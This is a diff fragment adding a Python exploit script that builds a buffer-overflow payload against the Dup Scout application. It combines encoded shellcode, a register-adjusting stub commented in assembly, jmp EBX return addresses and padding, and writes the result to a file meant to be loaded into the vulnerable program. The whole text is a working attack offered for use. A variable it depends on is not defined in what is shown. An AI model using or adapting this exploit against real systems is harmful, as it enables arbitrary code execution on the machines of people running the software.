+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+mixed = (
+    "\x53"  # push EBX
+    "\x58"  # pop EAX
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656
+    )
+
+junk = "\x53\x5b" * 119 + "\x53"
+
+data = "A"*4096 + jmpebx + "C"*16 + jmpebx + "C"*(5296 - 4096 - 4 - 16 - 4)
+ mixed + junk + buf
+
+a = open("Dup_Scout_buffer.txt", "w")
+a.write(data)
+a.close()
+
+#Greetz : @Pulkit